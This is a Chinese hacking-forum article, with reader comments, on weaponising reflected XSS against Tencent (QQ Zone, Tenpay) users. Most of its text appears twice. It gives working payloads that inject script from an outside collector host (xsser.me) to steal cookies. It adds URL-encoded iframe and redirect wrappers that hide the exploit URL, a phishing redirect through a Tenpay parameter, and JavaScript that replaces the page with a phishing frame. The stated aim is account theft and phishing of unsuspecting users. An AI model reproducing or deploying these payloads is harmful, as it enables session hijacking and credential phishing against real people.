漫谈反射xss利用
晚上无聊,没打草稿,想到哪,写到哪,凑合看吧.
先打个作者:Y35U
1,反射xss大吗?
反射xss相比flashxss和存储xss要多多了.
so对于用户基数越大的网站,反射xss的威力就越大
因为多嘛,所以利用者会大增。
再者,存储的封的会快,而反射的封的相对不及时。
xss中,普遍认为存储的危害最大,那是要看你X谁了
如果你要x管理员,那肯定是存储的危害大
如果你要x更多的人(跟你同等身份的访问者),存储的xss可以写蠕虫,效果明显,反射也可以,效果次之。
如果你要x指定的人(跟你同等身份的访问者),两者效果一样
再读读这个
2,怎么找反射xss?
典型的工具,比如
当然还有更多,比如BurpSuite的xsssacn插件,还有一些个人写的专业的工具.
所以反射xss叫只要神器在手,不怕xss没有了。
某牛说,不用工具,一天找tx的能找几十个.所以说,有技术真可怕。
3,如何把反射xss利用的“天衣无缝”?
反射跟存储的不同点在什么地方,我们要知道,只要能弥补掉反射的不完美之处,我们才好去处理。
0x1,浏览器的因素,浏览器对反射xss的影响是最大的 解决:bypass各种浏览器,这是可以做到的。
0x2,反射的url容易被明眼人看出来 解决:使用iframe框架,url跳转
4.能看看实际案例吗??
A.原型
exp:这个已经直接bypass各浏览器了。
A-1
我们直接框架到t00ls.net/index.html页面(举个例子哦)
在index.html <body>标签内添加用户体验:t00ls.net,抓到cookies传送到xssserme
A-2
如果不容许iframe怎么办?即,iframe之后,会跳出该src页面,岂不是暴露了
那就跳转吧
EXP:对了一句document.body.appendChild(e);>&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639
这个你可以写进xsser.me的js里面,这样url就跟第一个exp一样了。作用就是跳到正常页面去用户体验:t00ls.net,跳转到exp地址,再跳到正常页面,因为exp地址跟正常页面地址变化是最后面,跳的也很快,不是技术型的,看不出来,
B.
如果exp不通用,就是要针对ie9,FF有不同的exp
也很简单,ie8,ie9,chrome bypass这样的文章很多,可以看看
那我们要做的就是
iframe exp.js // exp.js负责判断浏览器版本,然后根据不同版本,输出不同的exp,针对打击
跟上面的A案例相比,就多一段js代码,即判断浏览器版本
要多写几个exp,跟A案例一样的形式,针对浏览器主要的有IE8.IE9.火狐.chrome.other(比如360.搜狗,都是用的ie内核)
把exp.js写成通用的,以后你有其他exp的时候,只需替换exp,就不用没次都写代码了,一劳永逸啊。
我写的给朋友看了,人家说非常烂,就不亮了,丢人。
C.
如果有一个完美的iframe xss,钓鱼的成功率相当之高可以把http://xj.hk/tenpay/用tx微博短地址加密一下。
当然,这个xss也可以去用javascript去抓cookies,但是我觉得钓鱼的危害更大!
当时测试,两用型,如果你害怕对手不上当,可以借鉴案例A去抓cookies ,如果你觉得对手是小白
这个钓鱼的成功率是相当之高
D.
你即要抓cookies,又要钓鱼(太狠了点)
这样就有冲突,因为抓cookies的要点是当前url是其他网站,只是框架了tx的地址
而钓鱼,则必须url是tx的地址,才可信
所为鱼和胸罩不可得兼、
如果都是是纯小白,url又长,倒是可以试试
做起来很简单,比如案例A来说
在xsserme的js加上做法跟A-2一样,用调转,比如,标题写着,tx抽奖活动,百分百中奖,大家快去领
把t00ls.net用tx短网址加密,或者直接发微博吧。。。
访问短网址之后,会二级跳到xss地址
这个时候,执行了xssserme的js,先抓了cookies,又重写了页面...............
好了,暂时想到这么多,下回再写哈
先打个作者:Y35U
1,反射xss大吗?
反射xss相比flashxss和存储xss要多多了.
so对于用户基数越大的网站,反射xss的威力就越大
因为多嘛,所以利用者会大增。
再者,存储的封的会快,而反射的封的相对不及时。
xss中,普遍认为存储的危害最大,那是要看你X谁了
如果你要x管理员,那肯定是存储的危害大
如果你要x更多的人(跟你同等身份的访问者),存储的xss可以写蠕虫,效果明显,反射也可以,效果次之。
如果你要x指定的人(跟你同等身份的访问者),两者效果一样
再读读这个
http://www.3hack.com/paper/%E6%B5%85%E8%B0%88%E8%85%BE%E8%AE%AF%E6%9E%B6%E6%9E%84%E7%BC%BA%E9%99%B7.txt
2,怎么找反射xss?
典型的工具,比如
http://www.3hack.com/tools/DOMinatorPro%E7%A0%B4%E8%A7%A3%E7%89%88.txt
http://www.3hack.com/paper/DOMinator%E4%BD%BF%E7%94%A8%E5%AE%9E%E4%BE%8B-%E8%A7%86%E9%A2%91.txt
当然还有更多,比如BurpSuite的xsssacn插件,还有一些个人写的专业的工具.
所以反射xss叫只要神器在手,不怕xss没有了。
某牛说,不用工具,一天找tx的能找几十个.所以说,有技术真可怕。
3,如何把反射xss利用的“天衣无缝”?
反射跟存储的不同点在什么地方,我们要知道,只要能弥补掉反射的不完美之处,我们才好去处理。
0x1,浏览器的因素,浏览器对反射xss的影响是最大的 解决:bypass各种浏览器,这是可以做到的。
0x2,反射的url容易被明眼人看出来 解决:使用iframe框架,url跳转
4.能看看实际案例吗??
A.
http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));"><img src=l onerror=
xxxxxxexp:
http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));"><img src=l onerror=e=document.createElement('script');e.setAttribute('src','//xsser.me/9NkBwy?1353065417')A-1
我们直接框架到t00ls.net/index.html页面(举个例子哦)
在index.html <body>标签内添加
<script>
var exp='%68%74%74%70%3A%2F%2F%63%74%63%2E%71%7A%73%2E%71%71%2E%63%6F%6D%2F%71%7A%6F%6E%65%2F%76%36%2F%6E%65%77%6C%69%6D%69%74%2F%69%6E%64%65%78%2E%68%74%6D%6C%3F%73%3D%31%26%75%69%6E%3D%31%31%34%39%36%37%36%33%39%29%29%3B%22%3E%3C%69%6D%67%20%73%72%63%3D%6C%20%6F%6E%65%72%72%6F%72%3D%65%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%65%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%27%2F%2F%78%73%73%65%72%2E%6D%65%2F%39%4E%6B%42%77%79%3F%31%33%35%33%30%36%35%34%31%37%27%29';//上面EXP的完全RUL编码
urllll = unescape(exp); //解码
var e=document.createElement('iframe');
e.width=1;
e.height=1;
e.setAttribute('src',urllll);
document.body.appendChild(e);
</script>A-2
如果不容许iframe怎么办?即,iframe之后,会跳出该src页面,岂不是暴露了
那就跳转吧
EXP:
http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));"><img src=l onerror=e=document.createElement('script');e.setAttribute('src','//xsser.me/9NkBwy?1353065417');document.body.appendChild(e);>&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639这个你可以写进xsser.me的js里面,这样url就跟第一个exp一样了。作用就是跳到正常页面去
<script>
var exp='%68%74%74%70%3A%2F%2F%63%74%63%2E%71%7A%73%2E%71%71%2E%63%6F%6D%2F%71%7A%6F%6E%65%2F%76%36%2F%6E%65%77%6C%69%6D%69%74%2F%69%6E%64%65%78%2E%68%74%6D%6C%3F%73%3D%31%26%75%69%6E%3D%31%31%34%39%36%37%36%33%39%29%29%3B%22%3E%3C%69%6D%67%20%73%72%63%3D%6C%20%6F%6E%65%72%72%6F%72%3D%65%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%65%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%27%2F%2F%78%73%73%65%72%2E%6D%65%2F%39%4E%6B%42%77%79%3F%31%33%35%33%30%36%35%34%31%37%27%29';
urllll = unescape(exp); //解码
window.location.href=urllll;//跳B.
如果exp不通用,就是要针对ie9,FF有不同的exp
也很简单,ie8,ie9,chrome bypass这样的文章很多,可以看看
那我们要做的就是
iframe exp.js // exp.js负责判断浏览器版本,然后根据不同版本,输出不同的exp,针对打击
跟上面的A案例相比,就多一段js代码,即判断浏览器版本
要多写几个exp,跟A案例一样的形式,针对浏览器主要的有IE8.IE9.火狐.chrome.other(比如360.搜狗,都是用的ie内核)
把exp.js写成通用的,以后你有其他exp的时候,只需替换exp,就不用没次都写代码了,一劳永逸啊。
我写的给朋友看了,人家说非常烂,就不亮了,丢人。
C.
如果有一个完美的iframe xss,钓鱼的成功率相当之高
http://baoxian.tenpay.com/zhongmin.shtml?redirecturl=http://xj.hk/tenpay/当然,这个xss也可以去用javascript去抓cookies,但是我觉得钓鱼的危害更大!
当时测试,两用型,如果你害怕对手不上当,可以借鉴案例A去抓cookies ,如果你觉得对手是小白
这个钓鱼的成功率是相当之高
D.
你即要抓cookies,又要钓鱼(太狠了点)
这样就有冲突,因为抓cookies的要点是当前url是其他网站,只是框架了tx的地址
而钓鱼,则必须url是tx的地址,才可信
所为鱼和胸罩不可得兼、
如果都是是纯小白,url又长,倒是可以试试
做起来很简单,比如案例A来说
在xsserme的js加上
top.document.body.innerHTML="<iframe width=100% height=100% frameborder=0 scrolling=no style=position:absolute;left:0;top:0 src=http://xj.hk/tenpay/></iframe>";把t00ls.net用tx短网址加密,或者直接发微博吧。。。
访问短网址之后,会二级跳到xss地址
这个时候,执行了xssserme的js,先抓了cookies,又重写了页面...............
好了,暂时想到这么多,下回再写哈
关于作者
评论23次
shouc收藏了。
思路不错,学xi了~
谁还用这个在wooyun drops 上投稿了??
写的很好,看看先
xss利用好啦威力无穷啊 呵呵
后排围观+学xi~XSS现在很热门啊
可以加上结合 Flash xss 利用
文章不错。
真心学xi了
好文要顶~话说在wooyun也看到了~
XSS现在很火的说
XSS的很多东西都没有理清。看了这篇更加的迷离了。大牛救救我吧!
XSS除了盗个COOKIE别的我都不会了
一只收藏XSS资料中,感谢分享
来顶下师傅的文章
为什么喜欢加个so呢?
好文,收藏了
好文很条理啊 ps:
我也在常州,求带
专注.net 飘过